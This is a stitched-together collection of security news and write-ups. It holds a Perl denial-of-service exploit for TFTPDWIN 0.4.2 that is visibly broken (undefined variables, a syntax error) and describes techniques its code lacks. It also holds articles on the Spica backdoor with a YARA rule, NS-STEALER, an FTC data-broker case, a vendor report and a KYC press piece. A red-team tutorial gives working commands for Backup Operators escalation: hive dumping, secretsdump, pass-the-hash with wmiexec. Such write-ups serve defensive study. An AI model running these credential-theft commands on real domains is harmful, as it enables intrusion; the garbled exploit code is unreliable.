ProSysInfo TFTP Server TFTPDWIN version 0.4.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 20 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: ProSysInfo TFTP Server TFTPDWIN 0.4.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=BuONti1AWoU

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The TFTP server does not correctly handle the amount of data or bytes sent..  
#When authenticating to the TFTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x520;

my $socket = IO::Socket::INET->new(  
    PeerAddr => $tftp_server,  
    PeerPort => 69,  
    Proto    => 'udp'  
) die "Não foi possível conectar ao servidor TFTP: $!\n" unless $socket;

    print $ftp_socket $buffer;

    close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#     ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Denial Of Service

Russian state-sponsored actor Coldriver uses spear phishing attacks to install the Spica backdoor on victim systems.

Researchers at Google’s Threat Analysis Group (TAG) have published their findings about a group they have dubbed Coldriver. The main targets of the Coldriver group are high-profile individuals in non-governmental organizations (NGOs), former intelligence and military officials, and NATO governments. These targets are approached in spear phishing attacks.

The group uses social engineering techniques to persuade their targets to open documents or download malware. Their activities are aligned with those of the Russian government, so it’s pretty safe to say that Coldriver is a state-sponsored group.

In December 2023, the US charged two Russians believed to be members of this group, for their role in a campaign that hacked government accounts.

Microsoft, who tracks the group as Star Blizzard, says the group targets individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests.

Typically, the group creates an impersonation account that pretends to be an expert in a field the target might be interested in or that is somehow affiliated with the target. Once a relationship has been established, the target will receive a phishing link or a document containing such a link.

To gain trust, Coldriver uses social media and professional marketing systems to build a profile of its target. With that information the group sets up email contacts, social media and other networking accounts that align with the target’s interests and appear legitimate.

Coldriver uses webmail addresses from different providers, including Outlook, Gmail, Yahoo and Proton Mail in the initial approach, impersonating known contacts of the target or well-known names in the target’s field of interest or sector. The group is also known to register malicious domains that mimic legitimate organizations.

Recently, TAG has noticed that the group uses “lure documents” to install a backdoor on the target’s system. These lure documents, which are harmless PDF files, are sent to the target, but when they open them the content appears to be encrypted.

When the target queries about the encryption, Coldriver sends the target a link to a decryption utility, typically hosted on a cloud storage site. This so-called decryption utility shows the target a normal PDF file, so that it appears as if the original was decrypted, but at the same time it installs a backdoor.

This backdoor is custom malware, likely developed by or for Coldriver, called Spica. Spica is written in the Rust programming language and supports, among others, these commands:

*   Execute arbitrary shell commands
*   Steal cookies from Chrome, Firefox, Opera, and Edge
*   Upload and download files
*   Analyze the filesystem by listing the content
*   Enumerate documents and copy them to an archive

The backdoor establishes persistence through an obfuscated PowerShell command that creates a scheduled task named CalendarChecker.

TAG suspects but has been unable to verify that there are multiple variants of Spica: one to match each lure document sent to targets.

**YARA rule**

YARA is a tool that can identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.

TAG has created a YARA rule that cab help find the Spica backdoor.

rule SPICA\_\_Strings {  
meta:

author = “Google TAG”  
description = “Rust backdoor using websockets for c2 and embedded decoy PDF”  
hash = “37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9”  
strings:  
$s1 = “os\_win.c:%d: (%lu) %s(%s) – %s”  
$s2 = “winWrite1”  
$s3 = “winWrite2”  
$s4 = “DNS resolution panicked”  
$s5 = “struct Dox”  
$s6 = “struct Telegram”  
$s8 = “struct Download”  
$s9 = “spica”  
$s10 = “Failed to open the subkey after setting the value.”  
$s11 = “Card Holder: Bull Gayts”  
$s12 = “Card Number: 7/ 3310 0195 4865”  
$s13 = “CVV: 592”  
$s14 = “Card Expired: 03/28”

$a0 = “agent\\\\src\\\\archive.rs”  
$a1 = “agent\\\\src\\\\main.rs”  
$a2 = “agent\\\\src\\\\utils.rs”  
$a3 = “agent\\\\src\\\\command\\\\dox.rs”  
$a4 = “agent\\\\src\\\\command\\\\shell.rs”  
$a5 = “agent\\\\src\\\\command\\\\telegram.rs”  
$a6 = “agent\\\\src\\\\command\\\\mod.rs”  
$a7 = “agent\\\\src\\\\command\\\\mod.rs”  
$a8 = “agent\\\\src\\\\command\\\\cookie\\\\mod.rs”  
$a9 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\mod.rs”  
$a10 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\browser\_name.rs”  
condition:  
7 of ($s\*) or 5 of ($a\*)  
}

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Coldriver threat group targets high-ranking officials to obtain credentials 

By Owais Sultan
Finclusive, Verida and cheqd Launch Pioneering Solution For Reusable And Verifiable KYC/KYB Credentials.
This is a post from HackRead.com Read the original post: Finclusive, Verida, and cheqd Launch Reusable KYC/KYB Solution

KYC/KYB compliance technology provider FinClusive said today it’s partnering with Verida and cheqd to launch an end-to-end platform for the creation and issuance of reusable and verifiable credentials that can be checked in real-time without impacting the privacy of clients. The partners say it’s a key innovation that promises to streamline client onboarding in both traditional finance and the nascent Web3 industry. 

What they’re offering is a plug-and-play platform that can handle the KYC/KYB requirements of any financial services organization, and generate verifiable credentials that are reusable and portable, with full client privacy and embedded compliance. 

The partnership builds on an earlier proof-of-concept demonstrated by FinClusive and Verida, which provides a mobile wallet for storing verifiable credentials. With the addition of cheqd into the mix, FinClusive said it can now offer the essential network infrastructure for Web3 companies to issue and verify credentials in seconds. 

With their new solution, the companies are looking to tackle some of the most significant headaches faced by organizations in the traditional customer onboarding and verification process, which is both expensive and time-consuming. Issuing digital credentials that can be reused, helps to eliminate the high costs associated with KYC/KYB. Moreover, with its instantaneous check feature for AML assistance, risk scoring and other background screenings, the solution makes it simpler than ever to meet compliance requirements. Finally, by integrating real-time and verifiable data sharing into the solution, the companies say they can provide maximum assurance for businesses, without requiring them to perform any manual checks. 

By addressing these headaches, Finclusive says it’s bringing significant value to businesses, reducing their operating costs and improving the efficiency of their screening processes. 

**Streamlined Customer Onboarding**

Each of the partners brings its strengths to the table, offering a variety of capabilities that are needed to create a regulatory-compliant process for verifying and sharing KYC credentials. FinClusive handles the initial identity verification checks with support for more than 170 countries, while cheqd’s Credential Service enables verifiable digital credentials to be issued, based on the results of those checks, and shared with other parties. As for Verida, it provides a decentralized wallet infrastructure for businesses and individuals to cryptographically store their KYC/KYB credentials inside a secure Verida Vault.

As the companies explained, the biggest advantage for businesses and individuals is that they will only ever have to undergo KYC/KYB once, and then use their verified credentials to access any application or service without constantly repeating that process. However, the solution goes further than similar offerings, leveraging FinClusive’s compliance tech and cheqd’s infrastructure platform to provide instant lookups for AML screenings and other background checks, meaning that the credentials can be verified, issued, managed, shared and revoked at any time. 

The beauty of this platform is that customers can maintain self-sovereign control of their KYC/KYB data, in keeping with regulations such as Europe’s existing GDPR and upcoming eIDAS, and the U.S. CCPA standard. Previously, where KYC/KYB data would have to be shared with multiple financial services providers, this information remains private yet fully verifiable. In this way, the partners are creating a more efficient market for identity verification while eliminating the need to replicate and store sensitive information. 

**Real-Time Monitoring **

Uniquely, FinClusive and its partners can facilitate enhanced and ongoing KYC/KYB processes beyond the initial onboarding stage. In some financial markets, service providers have additional obligations such as ongoing client monitoring, dynamic risk scoring and continuous AML screening checks. Using FinClusive’s tools, the solution can automate real-time client monitoring processes within an easy-to-use dashboard, while also enabling the simultaneous verification and live “double-check” of KYC/KYB data. 

**Disrupting Regulated Industries**

The companies cite several obvious use cases for their new solution, such as onboarding at any bank or nonbank financial service, plus any virtual asset service provider, at low cost and with more streamlined efficiency. The solution will also support KYC/KYB for eCommerce and online retailers, access to age-restricted content, government services and cross-border transactions. Finally, it also paves the way for KYC/KYB data to be paired with educational, employment, loyalty and health credentials to build higher levels of assurance and reinforce digital identities and reputations. 

Following today’s announcement, the companies say they’re expecting to roll out the first verifiable credentials for KYC/KYB within the first quarter of this year, kick-starting a revolution that will modernize client onboarding and monitoring across both traditional finance and the Web3 industry. 

Alex Tweeddale, a product lead at cheqd, said the collaboration is extremely innovative, paving the way for real-time monitoring and verification in a fully decentralized and private manner. “This is completely new to the market and enables us to provide a fully regulatory-compliant solution for customer onboarding and monitoring, while simultaneously being future-proofed for the new eIDAS 2.0 regulation for digital credentials,” he said. “This can revolutionize the existing paradigm for customer data sharing, reducing costs and friction within existing regulated industries and emerging markets where identity verification is currently too costly.”

Finclusive, Verida, and cheqd Launch Reusable KYC/KYB Solution

We analyzed 2,5 million vulnerabilities we discovered in our customer’s assets. This is what we found.

Digging into the data
The dataset we analyze here is representative of a subset of clients that subscribe to our vulnerability scanning services. Assets scanned include those reachable across the Internet, as well as those present on internal networks. The data includes findings for network

**_We analyzed 2,5 million vulnerabilities we discovered in our customer's assets. This is what we found._****Digging into the data**

The dataset we analyze here is representative of a subset of clients that subscribe to our vulnerability scanning services. Assets scanned include those reachable across the Internet, as well as those present on internal networks. The data includes findings for network equipment, desktops, web servers, database servers, and even the odd document printer or scanning device.

The number of organizations in this dataset is smaller (3 less) than the previous dataset used in last year's Security Navigator 2023 and some organizations were replaced by new additions. With the change of organizations comes a different mix of assets, which leaves comparing the previous results akin to comparing apples to oranges (we might be biased), but it's still worth noting similar patterns where possible.

This year, we revisit the menacing vulnerability theme with an eye on the ever-present and lingering tail of unresolved system weaknesses. The waves of newly discovered serious issues are just for our attention with existing unresolved issues, seeming like a hydra that keeps on growing new snaking heads as soon as you dispatch others.

Assessing whether a system is adequately protected is a challenge that requires skill and expertise and can take a lot of time. But we want to learn of any weaknesses beforehand rather than having to deal with the fallout of an unplanned "free pentest" by a random Cy-X group.

**Security Navigator 2024 is Here - Download Now#**

The newly released Security Navigator 2024 offers critical insights into current digital threats, documenting 129,395 incidents and 25,076 confirmed breaches. More than just a report, it serves as a guide to navigating a safer digital landscape.

****What's Inside?**#**

*   📈 **In-Depth Analysis:** Explore trends, attack patterns, and predictions. Learn from case studies in CyberSOC and Pentesting.
*   🔮 **Future-Ready:** Equip yourself with our security predictions and research summary.
*   👁️ **Real-Time Data:** From Dark Net surveillance to industry-specific statistics.

Stay one step ahead in cybersecurity. Your essential guide awaits!

🔗 Get Your Copy Now

**Vulnerability Scanning Findings by Severity**

Examining the severity rating share per unique Finding we see that the bulk of unique Findings, 79%, are classified as 'High' or 'Medium'. However, it is also worth noting that half, 50.4%, of unique Findings are considered 'Critical' or 'High.'

The average number of 'Critical' or 'High' Findings has decreased by 52.17% and 43.83%, respectively, compared to our previously published results. An improvement can also be observed for Findings with severity ratings 'Medium' and 'Low' being down 29.92% and 28.76%. As this report uses a slightly different sample of clients to last year, a YoY comparison has limited value, but we see evidence that clients are responding well to the findings we report, resulting in an overall improvement.

The majority of Findings (78%) rated 'Critical' or 'High' are 30 days or younger (when looking at a 120-day window). Conversely, 18% of all findings rated 'Critical' or 'High' are 150-days or older. From a prioritization perspective, 'Critical' or 'High' real findings seem to be dealt with swiftly, but some residual still accumulates over time. We see, therefore, that unresolved Findings continue to grow older. Indeed, ~35% of all unique CVEs are from findings 120 days or older.

The chart above shows the long tail of unresolved real findings. Note the first remarkable long tail peak around 660 days and the second one at 1380 days (3 years and 10 months).

**A window of opportunity**

The high average numbers of 'Critical' and 'High' findings are largely influenced by assets running Microsoft Windows or Microsoft Windows Server operating systems. Assets running operating systems other than Microsoft, such as Linux-based OS, are present, but these are reported proportionally far less.

We should note, however, that the 'Critical' or 'High' findings associated with assets running Windows are not necessarily vulnerabilities in the operating system but can also be related to applications running on the asset.

It is perhaps understandable that unsupported Microsoft Windows and Windows Server versions are prominent here, but it is surprising to find more recent versions of these operating systems with severities rated as 'Critical' or 'High'.

**Industry perspective**

We are using NAICS for our industry classification. The results here only consider Findings based on scans of hosts rather than services such as web applications. The average unique real Finding per unique asset is 31.74 across all organizations, denoted by the dashed horizontal line in the chart below.

Our clients in the Construction industry appear to be performing exceptionally well compared to clients in other industries, with an average of 12.12 Findings per Asset. At the opposite end of the spectrum, we have the Mining, Quarrying, and Oil and Gas industries, where we report an average of 76.25 unique findings per asset. Clients in Public Administration surprised us by outperforming Finance and Insurance with an average of 35.3 Findings per Asset, compared with 43.27, despite the larger number of Assets. Of course, these values are derived from the set of clients present in our sample and may not represent the universal reality.

When comparing the average severity per unique asset per Industry, we see a mixed picture. We can ignore Health Care and Social Assistance and Information, with a relatively small unique asset count, that results in averages that are disproportionate in relation to other Industries.

Our overall Industry average for Severity rating High is 21.93 and Mining, Quarrying and Oil and Gas Extraction have more than double that average.

Similarly, Finance and Insurance with Accommodation and Food Services also overshot the overall average by 10.2 and 3.4 findings per unique asset, respectively. The same three Industries exceeded the overall average for findings rated Critical, with Accommodation and Food Servers doing so by almost a factor of 3.

**Vulnerability is getting old**

As we revisit the menacing vulnerability theme this year, we once again look suspiciously at the ever-present and lingering tale of unresolved system weaknesses that are just getting older. We assessed over 2.5m vulnerability findings that we reported to our clients and over 1,500 reports from our professional ethical hackers to understand the current state of security vulnerabilities and consider their role and effectiveness as a tool for prioritization.

The bulk of unique Findings reported by our scanning teams - 79% - are classified as 'High' or 'Medium,' and 18% of all serious findings are 150 days or older. Though these are generally dealt with more swiftly than others, some residuals still accumulate over time. While most findings we identify are resolved after 90 days, 35% of all findings we report persist for 120 days or longer. And way too many are never addressed at all.

Our scanning results illuminate the persistent problem of unpatched vulnerabilities. Meanwhile, our Ethical Hacking teams more frequently encounter newer applications and systems built on contemporary platforms, frameworks, and languages.

The role of the Ethical Hacker is to conduct Penetration Tests – to emulate a malicious attacker and assess a system, application, device, or even people for vulnerabilities that could be used to gain access or deny access to IT resources.

Penetration Testing is generally considered a component of Vulnerability Management but could also be seen as a form of Threat Intelligence that businesses should leverage as part of their proactive defense strategy.

17.67% of findings our Ethical Hackers reported were rated as 'Serious', but, on a brighter note, hackers must work harder today to discover them than they had to in the past.

This is just an excerpt of the analysis. More details on our analysis of vulnerabilities and Pentesting (as well as a ton of other interesting research topics like VERIS categorization of the incidents handled in our CyberSOCs, Cyber Extortion statistics and an analysis of Hacktivism) can be found in the **Security Navigator**. Just fill in the form and get your download. It's worth it!

**Note:** _This informative piece has been expertly crafted and generously shared by Charl van der Walt, Head of the Security Research Center, Orange Cyberdefense._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

52% of Serious Vulnerabilities We Find are Related to Windows 10

Cybersecurity researchers have discovered a new Java-based "sophisticated" information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.

The malware, named NS-STEALER, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.

The ZIP file contains

Browser Security / Cyber Threat

Cybersecurity researchers have discovered a new Java-based "sophisticated" information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.

The malware, named **NS-STEALER**, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.

The ZIP file contains within it a rogue Windows shortcut file ("Loader GAYve"), which acts as a conduit to deploy a malicious JAR file that first creates a folder called "NS-<11-digit\_random\_number>" to store the harvested data.

To this folder, the malware subsequently saves screenshots, cookies, credentials, and autofill data stolen from over two dozen web browsers, system information, a list of installed programs, Discord tokens, Steam and Telegram session data. The captured information is then exfiltrated to a Discord Bot channel.

"Considering the highly sophisticated function of gathering sensitive information and using X509Certificate for supporting authentication, this malware can quickly steal information from the victim systems with \[Java Runtime Environment\]," Ramanathan said.

"The Discord bot channel as an EventListener for receiving exfiltrated data is also cost-effective."

The development comes as the threat actors behind the Chaes (aka Chae$) malware have released an update (version 4.1) to the information stealer with improvements to its Chronod module, which is responsible for pilfering login credentials entered in web browsers and intercepting crypto transactions.

Infection chains distributing the malware, per Morphisec, leverage legal-themed email lures written in Portuguese to deceive recipients into clicking on bogus links to deploy a malicious installer to activate Chae$ 4.1.

But in an interesting twist, the developers also left behind messages for security researcher Arnold Osipov – who has extensively analyzed Chaes in the past – expressing gratitude for helping them improve their "software" directly within the source code.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

NS-STEALER Uses Discord Bots to Exfiltrate Your Secrets from Popular Browsers

The Backup Operators is a Windows built-in group. Users which are part of this group have permissions to perform backup and restore operations. More specifically,… 
Continue reading → Domain Escalation – Backup Operator

The Backup Operators is a Windows built-in group. Users which are part of this group have permissions to perform backup and restore operations. More specifically, these users have the _SeBackupPrivilege_ assigned which enables them to read sensitive files from the domain controller i.e. Security Account Manager (SAM).

In the event that a user which has the _SeBackupPrivilege_ permission is compromised during red team operations this can provide a direct route to compromise the domain. Since this privilege has the permission to read and retrieve sensitive hives from the domain controller such as SAM, SECURITY and SYSTEM which There are multiple proof of concepts which have been disclosed publicly and can be utilized from different perspective to perform domain escalation i.e. implant, PowerShell, non-domain joined etc.

**Implant**

It is trivial to identify the user group membership by executing the command below:

    shell net user peter /domain

Backup Operator Privilege

It should be noted that the _SeBackupPrivilege_ it is not enabled by default even though the user is part of the Backup Operators group. Typically, this privilege is obtained when the implant is running from an elevated (it should not be confused with local administrator privileges) session using the credentials of the Backup Operator user. Executing the command below will obtain group and privilege information.

    whoami /all

Backup Operator – whoami /all

A .NET assembly has implemented by snovvcrash called RegSave which enables red team operators to conduct the technique via an implant. The tool can perform Active Directory enumeration to identify which groups have permissions over the registry.

    dotnet inline-execute /home/kali/RegSave.exe -t dc.red.lab --acl

RegSave – Access Control List

Using the _–backup_ flag will export the registry hives into a readable and accessible location in the domain controller. These files could be retrieved for an offline analysis with Impacket.

    dotnet inline-execute /home/kali/RegSave.exe -t dc.red.lab -o C:\Windows\SYSVOL\sysvol\red.lab\scripts --backup

RegSave

Verification that these files are accessible is feasible by executing the following command from the implant.

    dir \\10.0.0.1\C$\Windows\SYSVOL\sysvol\red.lab\scripts

List Hives DC

An alternative approach would be to dump the SAM, SECURITY and SYSTEM hives into a UNC share. The _smbserver_ from impacket suite can set up a simple SMB server:

    impacket-smbserver -smb2support share /tmp/share

SMB Share

The BackupOperatorToDA is a proof of concept written in C++ which can target domain controllers using an account which is part of the Backup Operators group. The proof of concept can export the registry hives into _C:\\temp_ path or into a UNC share.

    BackupOperatorToDA.exe -t \\dc.red.lab -u peter -p Password123 -d red.lab -o //10.0.0.3/share/BackupOperatorToDA.exe -t \\dc.red.lab -u peter -p Password123 -d red.lab -o C:\temp

BackupOperatorToDA

SAM Hive

UNC Share – SAM Hive

Using the exported files _secretsdump_ from Impacket can decrypt the contents of the SAM registry hive into order to dump local hashes of the domain controller.

    impacket-secretsdump -sam /tmp/share/SAM -system /tmp/share/SYSTEM -security /tmp/share/SECURITY LOCAL

Dump Domain Hashes

Using the hash of the domain controller machine account it is feasible also to dump all the domain hashes.

    impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:73ba6ef0d8ae6a755fc118e8df6540f7 -just-dc red/dc\$@10.0.0.1

Dump Domain Hashes

Using the password hash of the domain administrator it is possible to access the domain controller directly using a WMI connection.

    impacket-wmiexec Administrator@10.0.0.1 -hashes ':58a478135a93ac3bf058a5ea0e8fdb71'

impacket-wmiexec

**PowerShell**

As it has been mentioned above by default the _SeBackupPrivilege_ is disabled even if the user is part of the Backup Operators group. Giuliano Cioffi developed two DLL’s which can be used to enable the required privilege from a PowerShell console.

Import-Module .\\SeBackupPrivilegeUtils.dll
Import-Module .\\SeBackupPrivilegeCmdLets.dll
Get-SeBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege
whoami /priv | findstr Backup

SeBackupPrivilege

Verification of the permissions over the domain controller is feasible by listing the files on the C$ share.

Access DC C$

It is also useful to enumerate which groups have the _SeBackupPrivilege_ as in a corporate environment there might be custom groups outside of the standards like Domain Administrators and Backup Operators. Executing the following commands will retrieve the group Security Identifiers that have this privilege. PowerShell can also convert the principal security identifiers into a readable format.

Get-ChildItem -Path \\\\$ENV:USERDNSDOMAIN\\sysvol\\$ENV:USERDNSDOMAIN\\Policies\\ -Recurse -File  -ErrorAction SilentlyContinue | Select-String "SeBackupPrivilege"

# Give SID as input to .NET Framework Class
$SID = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1326752099-4012446882-462961959-1103")

# Use Translate to find user from sid
$objUser = $SID.Translate(\[System.Security.Principal.NTAccount\])

# Print the converted SID to username value
$objUser.Value

Identify Groups with Backup Privilege

The BackupOperatorToolkit has four different modes to perform domain escalation from the Backup Operators group. Specifically, the _service_ mode will create a service in the domain controller that will executed during reboot via registry modifications, the _DSRM_ mode will modify _DsrmAdminLogonBehavior_ registry key to enable Windows Remote Management Authentication (WinRM), the DUMP mode will dump the SAM, SECURITY and SYSTEM hives to a local path in the domain controller or to a UNC path and the _IFEO_ mode which will run an application (i.e. implant) when a process is terminated.

.\\BackupOperatorToolkit.exe DUMP C:\\tmp \\\\dc.red.lab

BackupOperator Toolkit

Dump Registry Hives

**Non-Domain Joined**

In insider threat scenarios it might be possible to use a host which is not part of the domain. Using a python tool it is possible to initiate an authentication with the domain controller from an account which is part of the Backup Operators group. The tool will export the SAM, SECURITY and SYSTEM registry hives into a arbitrary SMB share.

    python3 reg.py  peter:'Password123'@10.0.0.1 backup -p '//10.0.0.3/share'

Backup Operator – Non Domain Joined

Using the SAM, SYSTEM and SECURITY hives in conjunction with _secretsdump_ will extract the hashes from the SAM file.

    impacket-secretsdump -sam /tmp/share/SAM -system /tmp/share/SYSTEM -security /tmp/share/SECURITY LOCAL

Impacket-secretsdump

The password hash of the domain controller machine account can be used to verify authentication with the domain controller using _crackmapexec_:

    crackmapexec smb 10.0.0.1 -u DC\$ -H 73ba6ef0d8ae6a755fc118e8df6540f7

crackmapexec

**References**

1.  https://github.com/horizon3ai/backup\_dc\_registry
2.  https://github.com/decoder-it/BadBackupOperator/
3.  https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/
4.  https://github.com/giuliano108/SeBackupPrivilege
5.  https://cube0x0.github.io/Pocing-Beyond-DA/
6.  https://github.com/Wh04m1001/Random/blob/main/BackupOperators.cpp
7.  https://github.com/improsec/BackupOperatorToolkit
8.  https://github.com/snovvcrash/RemoteRegSave
9.  https://github.com/mpgn/BackupOperatorToDA
10.  https://adsecurity.org/?p=3700

**Post navigation**

Domain Escalation – Backup Operator

The U.S. Federal Trade Commission (FTC) is continuing to clamp down on data brokers by prohibiting InMarket Media from selling or licensing precise location data.
The settlement is part of allegations that the Texas-based company did not inform or seek consent from consumers before using their location information for advertising and marketing purposes.
"InMarket will also be prohibited from

The U.S. Federal Trade Commission (FTC) is continuing to clamp down on data brokers by prohibiting InMarket Media from selling or licensing precise location data.

The settlement is part of allegations that the Texas-based company did not inform or seek consent from consumers before using their location information for advertising and marketing purposes.

"InMarket will also be prohibited from selling, licensing, transferring, or sharing any product or service that categorizes or targets consumers based on sensitive location data," the FTC said last week.

In addition, it has been ordered to destroy all the location data it previously collected subject to users' assent, as well as provide a mechanism for consumers to withdraw their consent and request for deletion of the information previously collected.

The development makes InMarket the second data aggregator to face a ban in as many weeks after Outlogic (formerly X-Mode Social), which faced accusations that it had sold location information that could be used to track users' visits to medical and reproductive health clinics, places of religious worship, and domestic abuse shelters.

Like Outlogic, InMarket is said to harvest location information from its own proprietary apps like CheckPoints and ListEase, and more than 300 other third-party applications that incorporate its software development kit (SDK). These apps have been downloaded onto over 420 million unique devices since 2017.

"If the user allows access, InMarket SDK receives the device's precise latitude and longitude, along with a timestamp and a unique mobile device identifier, as often as the mobile device's operating system provides it — ranging from almost no collection when the device is idle, to every few seconds when the device is actively moving — and transmits it directly to \[InMarket's\] servers," the FTC complaint read.

This historical data is then used to slot consumers into nearly 2,000 segments based on the locations visited and serve tailored ads on apps that include the SDK. It also offers a product that pushes ads to consumers based on their current whereabouts, serving ads related to medicines, for example, when a person is within 200 meters of a pharmacy.

The company, which was previously exposed by The Markup in September 2021, claims to provide its "customers with access to the most accurate and precise, permission-based, SDK-derived location data available today."

The FTC further said InMarket did little to ensure that third-party apps that embed the company's SDK have obtained users' express consent, noting that it failed to notify third-party apps that the location data provided through its SDK will be combined with other data points to create profiles of consumers.

To make matters worse, the company's five-year data retention policy was described as "unnecessary to carry out the purposes for which it was collected," and that it put customers at risk by exposing the information to other kinds of misuse.

As mitigations, InMarket "will be required to create a sensitive location data program to prevent the company from using, selling, licensing, transferring, or otherwise sharing any products or services that categorize or target consumers based on sensitive location data."

The disclosure comes as a joint study published by Consumer Reports and The Markup found that Meta-owned Facebook gets data on individual users from thousands of companies.

On average, the company received data from 2,230 different companies for each of the 709 volunteers, with some identified by more than 7,000 companies. In all, the participants had their data shared by a whopping 186,892 companies.

One of those participants had their information coming from nearly 48,000 different companies, suggesting "unusual app usage habits" or possibly an appealing candidate for microtargeted advertising.

"The company that shared data on the largest number of participants was LiveRamp, a data broker, which shared data on 679, or about 96%, of study participants," the study said. "A large percentage of the approximately 186,000 companies that appeared in our data appeared to be either small retailers or non-national brands (or were unidentifiable by name)."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

FTC Bans InMarket for Selling Precise User Location Without Consent

In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects.

**Clojure classes can be used to craft a serialized object that runs arbitrary code on deserialization**

Critical severity GitHub Reviewed Published Jan 22, 2024 to the GitHub Advisory Database • Updated Jan 22, 2024

GHSA-jgxc-8mwq-9xqw: Clojure classes can be used to craft a serialized object that runs arbitrary code on deserialization

MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen.

**Code execution in metagpt**

High severity GitHub Reviewed Published Jan 22, 2024 to the GitHub Advisory Database • Updated Jan 22, 2024

Tag

#git